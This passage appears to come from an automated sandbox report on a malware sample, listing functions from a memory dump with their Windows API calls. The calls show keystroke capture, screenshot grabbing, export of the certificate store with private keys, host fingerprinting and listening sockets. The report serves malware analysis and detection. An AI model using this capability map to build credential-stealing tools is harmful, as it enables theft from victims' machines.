Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00B1E360: _errno.MSVCRT ref: 00B1E37B
Part of subcall function 00B1E360: _errno.MSVCRT ref: 00B1E3AD

Strings

2, xrefs: 00AF3B51

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5150, Relevance: 12.5, APIs: 7, Instructions: 72

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 00AF5160
GetTokenInformation.ADVAPI32(00000001,00000019,00000000,00000000,?), ref: 00AF5179
GetLastError.KERNEL32(?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF5183

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

GetTokenInformation.ADVAPI32(00000001,00000019,?,?,?), ref: 00AF51AE
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF51BA
GetSidSubAuthority.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF51D1

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

CloseHandle.KERNEL32(00000001), ref: 00AF51FD

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B13382, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172

APIs

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00B133A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 00B133F2

Part of subcall function 00B12EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00AEFD6D,?,00000004,00007530,?,?,?,?), ref: 00B12ED9
Part of subcall function 00B12EA3: WSASetLastError.WS2_32(?), ref: 00B12F21

WSAGetLastError.WS2_32(?,00000800,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00B134D2
shutdown.WS2_32(?,00000001), ref: 00B134FD
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00B13526

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

WSASetLastError.WS2_32(0000274C,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?,00002710), ref: 00B1357A

Strings

, xrefs: 00B134E3

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEDFE6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115

APIs

EnterCriticalSection.KERNEL32 ref: 00AEE010
LeaveCriticalSection.KERNEL32 ref: 00AEE0C0

Part of subcall function 00AF4085: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00AF4097
Part of subcall function 00AF4085: GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00AF40AF
Part of subcall function 00AF4085: CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AF40EE
Part of subcall function 00AF4085: CreateCompatibleDC.GDI32 ref: 00AF40FF
Part of subcall function 00AF4085: LoadCursorW.USER32(00000000,00007F00), ref: 00AF4115
Part of subcall function 00AF4085: GetIconInfo.USER32(?,?), ref: 00AF4129
Part of subcall function 00AF4085: GetCursorPos.USER32(?), ref: 00AF4138
Part of subcall function 00AF4085: GetDeviceCaps.GDI32(?,00000008), ref: 00AF414F
Part of subcall function 00AF4085: GetDeviceCaps.GDI32(?,0000000A), ref: 00AF4158
Part of subcall function 00AF4085: CreateCompatibleBitmap.GDI32(?,?), ref: 00AF4164
Part of subcall function 00AF4085: SelectObject.GDI32 ref: 00AF4172
Part of subcall function 00AF4085: BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00AF4193
Part of subcall function 00AF4085: DrawIcon.USER32(?,?,?,?), ref: 00AF41C5
Part of subcall function 00AF4085: SelectObject.GDI32(?,00000008), ref: 00AF41E1
Part of subcall function 00AF4085: DeleteObject.GDI32 ref: 00AF41E8
Part of subcall function 00AF4085: DeleteDC.GDI32 ref: 00AF41EF
Part of subcall function 00AF4085: DeleteDC.GDI32 ref: 00AF41F6
Part of subcall function 00AF4085: FreeLibrary.KERNEL32(?), ref: 00AF4206
Part of subcall function 00AF4085: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00AF421C
Part of subcall function 00AF4085: FreeLibrary.KERNEL32(?), ref: 00AF4230

GetTickCount.KERNEL32 ref: 00AEE06A
GetCurrentProcessId.KERNEL32 ref: 00AEE071

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

GetKeyboardState.USER32(?), ref: 00AEE0DC
ToUnicode.USER32(?,?,?,?,00000009,00000000), ref: 00AEE0FF

Part of subcall function 00AEDE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00AEE138,?,?,?,?,?,00000009,00000000), ref: 00AEDE7E
Part of subcall function 00AEDE64: memcpy.MSVCRT ref: 00AEDEEF
Part of subcall function 00AEDE64: memcpy.MSVCRT ref: 00AEDF13
Part of subcall function 00AEDE64: memcpy.MSVCRT ref: 00AEDF2A
Part of subcall function 00AEDE64: memcpy.MSVCRT ref: 00AEDF4A
Part of subcall function 00AEDE64: LeaveCriticalSection.KERNEL32 ref: 00AEDF65

Strings

, xrefs: 00AEE11D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEB28A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94

APIs

memset.MSVCRT ref: 00AEB29B
GlobalMemoryStatusEx.KERNEL32(?), ref: 00AEB2B2
GetNativeSystemInfo.KERNEL32(?), ref: 00AEB2E3

Part of subcall function 00B00D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00B00D60

GetSystemMetrics.USER32(0000004F), ref: 00AEB370

Part of subcall function 00B00FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00B0BD4B,?), ref: 00B00FF2

Part of subcall function 00B00D19: RegFlushKey.ADVAPI32 ref: 00B00D29
Part of subcall function 00B00D19: RegCloseKey.ADVAPI32 ref: 00B00D31

GetSystemMetrics.USER32(00000050), ref: 00AEB363
GetSystemMetrics.USER32(0000004E), ref: 00AEB36A

Strings

@, xrefs: 00AEB2AB

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B04ED1, Relevance: 12.3, APIs: 4, Strings: 2, Instructions: 60

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00B04EE5
PathUnquoteSpacesW.SHLWAPI(?), ref: 00B04F4A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B04F59
LocalFree.KERNEL32(00000001), ref: 00B04F6D

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 00B04EFC
ProfileImagePath, xrefs: 00B04F26

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEAB81, Relevance: 12.1, APIs: 8, Instructions: 147

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00AEABB8
GetCommandLineW.KERNEL32 ref: 00AEABD9

Part of subcall function 00B14333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B1435D
Part of subcall function 00B14333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000), ref: 00B14392

GetUserNameExW.SECUR32(00000002,?), ref: 00AEAC11
GetProcessTimes.KERNEL32(000000FF,?,?,?,?), ref: 00AEAC47
GetUserDefaultUILanguage.KERNEL32 ref: 00AEACB9
memcpy.MSVCRT ref: 00AEACED
memcpy.MSVCRT ref: 00AEAD02
memcpy.MSVCRT ref: 00AEAD18

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEFFC2, Relevance: 12.1, APIs: 8, Instructions: 120

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00AF23DE,?,?,?,00000000), ref: 00AEFFCE
WaitForSingleObject.KERNEL32(?,00000000), ref: 00AF0009
CloseHandle.KERNEL32 ref: 00AF001C

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

memcpy.MSVCRT ref: 00AF003F
memset.MSVCRT ref: 00AF0059
memcpy.MSVCRT ref: 00AF009F
memset.MSVCRT ref: 00AF00BD

Part of subcall function 00AF5B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00AED091,?,?,00000000,0000EA60,00000000), ref: 00AF5B48
Part of subcall function 00AF5B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00AF5B6C
Part of subcall function 00AF5B40: CloseHandle.KERNEL32 ref: 00AF5B7C
Part of subcall function 00AF5B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00AED091,?,?,00000000,0000EA60,00000000), ref: 00AF5BAC

Part of subcall function 00AF5BB5: EnterCriticalSection.KERNEL32(00DB28B4,00DB28A8,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001,?,00B04E98,?,00000001), ref: 00AF5BBE
Part of subcall function 00AF5BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AF5BF7
Part of subcall function 00AF5BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00AFE48F,00000000,00000000,00000002), ref: 00AF5C16
Part of subcall function 00AF5BB5: GetLastError.KERNEL32(?,000000FF,00AFE48F,00000000,00000000,00000002,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001), ref: 00AF5C20
Part of subcall function 00AF5BB5: TerminateThread.KERNEL32 ref: 00AF5C28
Part of subcall function 00AF5BB5: CloseHandle.KERNEL32 ref: 00AF5C2F
Part of subcall function 00AF5BB5: LeaveCriticalSection.KERNEL32(00DB28B4,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001,?,00B04E98,?,00000001), ref: 00AF5C44
Part of subcall function 00AF5BB5: ResumeThread.KERNEL32 ref: 00AF5C5D

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00AF23DE,?,?,?,00000000), ref: 00AF0111

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEE35B, Relevance: 11.3, APIs: 6, Instructions: 129

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00AEE376
PathAddBackslashW.SHLWAPI(?), ref: 00AEE3A0

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

CreateDirectoryW.KERNEL32(?), ref: 00AEE457
SetFileAttributesW.KERNEL32(?), ref: 00AEE468
CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00AEE481
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00AEE492

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6240, Relevance: 11.0, APIs: 6, Instructions: 115

APIs

lstrlenA.KERNEL32(?,?), ref: 00AF6279
CreateMutexW.KERNEL32(00B22974,00000001,?), ref: 00AF62D1
GetLastError.KERNEL32(?,?,?,?), ref: 00AF62E1
CloseHandle.KERNEL32 ref: 00AF62EF

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

memcpy.MSVCRT ref: 00AF6319
memcpy.MSVCRT ref: 00AF632D

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF5406: CreateThread.KERNEL32(00000000,00000000,00B154A0,?), ref: 00AF5417
Part of subcall function 00AF5406: CloseHandle.KERNEL32 ref: 00AF5422

Part of subcall function 00AF2FB7: ReleaseMutex.KERNEL32 ref: 00AF2FBB
Part of subcall function 00AF2FB7: CloseHandle.KERNEL32 ref: 00AF2FC2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF1B16, Relevance: 10.9, APIs: 6, Instructions: 65

APIs

CreateFileW.KERNEL32(00DB1EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF1B2F
GetFileSizeEx.KERNEL32(?,?), ref: 00AF1B42
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AF1B68
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00AF1B80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF1B9E
CloseHandle.KERNEL32 ref: 00AF1BA7

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0BBA1, Relevance: 10.9, APIs: 6, Instructions: 57

APIs

Part of subcall function 00B04214: EnterCriticalSection.KERNEL32(00B23510,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00B0422E
Part of subcall function 00B04214: LeaveCriticalSection.KERNEL32(00B23510,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00B04261
Part of subcall function 00B04214: CoTaskMemFree.OLE32(00000000), ref: 00B042F6
Part of subcall function 00B04214: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04303
Part of subcall function 00B04214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00B0431A

PathRemoveBackslashW.SHLWAPI ref: 00B0BBCD
PathRemoveFileSpecW.SHLWAPI ref: 00B0BBDA
PathAddBackslashW.SHLWAPI ref: 00B0BBEB
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 00B0BBFE
CLSIDFromString.OLE32(?,00B22DB4,?,?,00000064,?,?,?,?,?,00000064,?,00B22DB4,?,?,00000000), ref: 00B0BC1A
memset.MSVCRT ref: 00B0BC2C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6D02, Relevance: 10.9, APIs: 6, Instructions: 39

APIs

socket.WS2_32(?,00000001,00000006), ref: 00AF6D0E
bind.WS2_32 ref: 00AF6D2B
listen.WS2_32(?,00000001), ref: 00AF6D38
WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00B115FC,?,?,?), ref: 00AF6D42
closesocket.WS2_32 ref: 00AF6D4B
WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00B115FC,?,?,?), ref: 00AF6D52

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF0C35, Relevance: 10.9, APIs: 6, Instructions: 197

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AF0C9B
memcpy.MSVCRT ref: 00AF0CB5
VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00AF0CC8
memset.MSVCRT ref: 00AF0D1F
memcpy.MSVCRT ref: 00AF0D33
VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00AF0E22

Part of subcall function 00AF0FC3: LoadLibraryA.KERNEL32 ref: 00AF1013

Part of subcall function 00AF1149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF1158

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0FA0A, Relevance: 10.8, APIs: 6, Instructions: 161

APIs

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00AED004,00000000), ref: 00B0FB0C

Part of subcall function 00B0FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00B0FB19,?,77C475F0,7C809F91,?,?,?,?,00AED004,00000000), ref: 00B0FE4D
Part of subcall function 00B0FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00B0FB19,?,77C475F0,7C809F91,?,?,?,?,00AED004,00000000), ref: 00B0FE84

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00AED004,00000000), ref: 00B0FB4D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B0FB5C
SetEvent.KERNEL32 ref: 00B0FB6C
GetExitCodeThread.KERNEL32(?,?), ref: 00B0FB80
CloseHandle.KERNEL32 ref: 00B0FB96

Part of subcall function 00AF5BB5: EnterCriticalSection.KERNEL32(00DB28B4,00DB28A8,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001,?,00B04E98,?,00000001), ref: 00AF5BBE
Part of subcall function 00AF5BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AF5BF7
Part of subcall function 00AF5BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00AFE48F,00000000,00000000,00000002), ref: 00AF5C16
Part of subcall function 00AF5BB5: GetLastError.KERNEL32(?,000000FF,00AFE48F,00000000,00000000,00000002,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001), ref: 00AF5C20
Part of subcall function 00AF5BB5: TerminateThread.KERNEL32 ref: 00AF5C28
Part of subcall function 00AF5BB5: CloseHandle.KERNEL32 ref: 00AF5C2F
Part of subcall function 00AF5BB5: LeaveCriticalSection.KERNEL32(00DB28B4,?,00000001,00AFE48F,00000000,00AFE1B7,00000000,?,00000000,?,00000001,?,00B04E98,?,00000001), ref: 00AF5C44
Part of subcall function 00AF5BB5: ResumeThread.KERNEL32 ref: 00AF5C5D

Part of subcall function 00B101B2: memcmp.MSVCRT ref: 00B101CB
Part of subcall function 00B101B2: memcmp.MSVCRT ref: 00B10227
Part of subcall function 00B101B2: memcmp.MSVCRT ref: 00B1028D

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00B04CA0: memcpy.MSVCRT ref: 00B04CC6
Part of subcall function 00B04CA0: memset.MSVCRT ref: 00B04D69

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEA150, Relevance: 10.8, APIs: 7, Instructions: 122

APIs

memcpy.MSVCRT ref: 00AEA18C
memcpy.MSVCRT ref: 00AEA1A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00AEA1D3
memcpy.MSVCRT ref: 00AEA209
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00AEA239
memcpy.MSVCRT ref: 00AEA26F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00AEA29F

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF24AA, Relevance: 10.8, APIs: 6, Instructions: 91

APIs

CertOpenSystemStoreW.CRYPT32(00000000), ref: 00AF24BC
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00AF24DA
CertEnumCertificatesInStore.CRYPT32(?,?,?,00000000), ref: 00AF24E7
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000), ref: 00AF251B

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000,00000004,?,?,?,00000000), ref: 00AF254D

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF258C: GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00AF25BA
Part of subcall function 00AF258C: GetSystemTime.KERNEL32(?), ref: 00AF260D
Part of subcall function 00AF258C: CharLowerW.USER32(?), ref: 00AF265D
Part of subcall function 00AF258C: PathRenameExtensionW.SHLWAPI(?,?), ref: 00AF268D

CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00AF257C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B12D0B, Relevance: 10.7, APIs: 6, Instructions: 64

APIs

accept.WS2_32(?,0000EA60), ref: 00B12D2C
WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00B12D3E

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00AED163), ref: 00B12D95

Part of subcall function 00B12917: WSACreateEvent.WS2_32(00000000,?,00B12C15,?,00000000,?,00B12CD1,?,?,?,?,00000000), ref: 00B1292D
Part of subcall function 00B12917: WSAEventSelect.WS2_32(?,?,00B12CD1), ref: 00B12943
Part of subcall function 00B12917: WSACloseEvent.WS2_32(?), ref: 00B12957

Part of subcall function 00B12855: getsockopt.WS2_32(0000EA60,0000FFFF,00002004,?,?), ref: 00B1288F
Part of subcall function 00B12855: memset.MSVCRT ref: 00B128A3

WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00AED163,?), ref: 00B12D6F
shutdown.WS2_32(?,00000002), ref: 00B12D87
closesocket.WS2_32 ref: 00B12D8E

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6378, Relevance: 10.6, APIs: 7, Instructions: 146

APIs

Part of subcall function 00AF568C: TlsSetValue.KERNEL32(00000001,00AFE1BD), ref: 00AF5699

Part of subcall function 00B0BEE3: CreateMutexW.KERNEL32(00B22974,00000000,?), ref: 00B0BF05

GetCurrentThread.KERNEL32 ref: 00AF63A4
SetThreadPriority.KERNEL32 ref: 00AF63AB

Part of subcall function 00B04B8D: WaitForSingleObject.KERNEL32(00000000,00AFE1D7), ref: 00B04B95

memset.MSVCRT ref: 00AF63ED
lstrlenA.KERNEL32(00000050), ref: 00AF6404

Part of subcall function 00AF5D25: memset.MSVCRT ref: 00AF5D35

Part of subcall function 00B00A9A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B00AD8
Part of subcall function 00B00A9A: PathRemoveFileSpecW.SHLWAPI(?), ref: 00B00B26
Part of subcall function 00B00A9A: FindFirstFileW.KERNEL32(?,?), ref: 00B00B93
Part of subcall function 00B00A9A: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B00BEA
Part of subcall function 00B00A9A: SetLastError.KERNEL32(00000057,?), ref: 00B00C5B
Part of subcall function 00B00A9A: CloseHandle.KERNEL32 ref: 00B00C95
Part of subcall function 00B00A9A: FindNextFileW.KERNEL32(?,?), ref: 00B00CC9
Part of subcall function 00B00A9A: FindClose.KERNEL32 ref: 00B00CF3

memset.MSVCRT ref: 00AF64CA
memcpy.MSVCRT ref: 00AF64DA

Part of subcall function 00AF6240: lstrlenA.KERNEL32(?,?), ref: 00AF6279
Part of subcall function 00AF6240: CreateMutexW.KERNEL32(00B22974,00000001,?), ref: 00AF62D1
Part of subcall function 00AF6240: GetLastError.KERNEL32(?,?,?,?), ref: 00AF62E1
Part of subcall function 00AF6240: CloseHandle.KERNEL32 ref: 00AF62EF
Part of subcall function 00AF6240: memcpy.MSVCRT ref: 00AF6319
Part of subcall function 00AF6240: memcpy.MSVCRT ref: 00AF632D

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

WaitForSingleObject.KERNEL32(00007530), ref: 00AF6504

Part of subcall function 00AF2FB7: ReleaseMutex.KERNEL32 ref: 00AF2FBB
Part of subcall function 00AF2FB7: CloseHandle.KERNEL32 ref: 00AF2FC2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFDEBB, Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 27

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 00AFDEC9
GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00AFDED5
SetLastError.KERNEL32(00000001,00B042C8,00B22954,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00AFDEED

Strings

shell32.dll, xrefs: 00AFDEC8
SHGetKnownFolderPath, xrefs: 00AFDED3

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF79B9, Relevance: 10.6, APIs: 7, Instructions: 126

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00AF79F0
WSASetLastError.WS2_32(00000008), ref: 00AF79FF
memcpy.MSVCRT ref: 00AF7A1C
memcpy.MSVCRT ref: 00AF7A2E
WSASetLastError.WS2_32(00000008,?,?,?), ref: 00AF7A98
WSAGetLastError.WS2_32(?,?,?), ref: 00AF7AB4

Part of subcall function 00AF7CDE: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 00AF7D2F
Part of subcall function 00AF7CDE: RegisterWaitForSingleObject.KERNEL32(?,?,00AF7B1D,?,000000FF,00000004), ref: 00AF7D43

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?), ref: 00AF7ADD

Part of subcall function 00AEF9C5: memcpy.MSVCRT ref: 00AEF9DA
Part of subcall function 00AEF9C5: SetEvent.KERNEL32 ref: 00AEF9EA

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5208, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60

APIs

memset.MSVCRT ref: 00AF5229
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00AF5261
memcpy.MSVCRT ref: 00AF527C
CloseHandle.KERNEL32(?), ref: 00AF5291
CloseHandle.KERNEL32(?), ref: 00AF5297

Strings

D, xrefs: 00AF5232

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEA5B2, Relevance: 10.5, APIs: 4, Strings: 1, Instructions: 293

APIs

Part of subcall function 00B0BEE3: CreateMutexW.KERNEL32(00B22974,00000000,?), ref: 00B0BF05

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

Part of subcall function 00AF1B16: CreateFileW.KERNEL32(00DB1EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF1B2F
Part of subcall function 00AF1B16: GetFileSizeEx.KERNEL32(?,?), ref: 00AF1B42
Part of subcall function 00AF1B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AF1B68
Part of subcall function 00AF1B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00AF1B80
Part of subcall function 00AF1B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF1B9E
Part of subcall function 00AF1B16: CloseHandle.KERNEL32 ref: 00AF1BA7

memset.MSVCRT ref: 00AEA757
memcpy.MSVCRT ref: 00AEA780

Part of subcall function 00B0D95F: GetSystemTime.KERNEL32(?), ref: 00B0D969

Part of subcall function 00AF69C9: HeapAlloc.KERNEL32(00000000,?,?,00B14E9D,00AE9851,?,?,00B14FB1,?,?,?,?,?,?,?,?), ref: 00AF69F3
